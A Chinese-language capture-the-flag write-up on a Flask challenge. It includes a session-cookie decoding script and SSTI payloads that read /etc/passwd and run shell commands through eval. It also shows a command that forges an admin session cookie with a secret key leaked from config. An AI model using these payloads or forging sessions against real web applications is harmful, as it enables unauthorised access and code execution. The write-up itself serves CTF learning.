前言:伪造session一定要密钥!!!
工具介绍
FLASK解密
不推荐网上那个,反而这个倒是挺好用
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption("eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs".encode()))
FLASK加密脚本
GITHUB给你爱:
https://github.com/noraj/flask-session-cookie-manager
解题过程
首先打开网站,看到your name is none???猜想可以构造name参数
确实可以,想起HCTF一道题,会不会是SSTI???
果然是这样的
以为是模板注入题目,百度尝试了很多都没有成功
().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' )
最后发现自己是傻逼,都说了要admin身份,那么肯定是flask-session伪造啊
想到伪造session肯定需要key,突然想到可以去config里面寻找
得到key。woshicaiji别骂了,别骂了,F12寻找session
利用脚本解密得到是{'username': b'guest'}尝试修改为admin
python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"使用脚本解密得到session
进入/flag页面,奥里给了兄弟
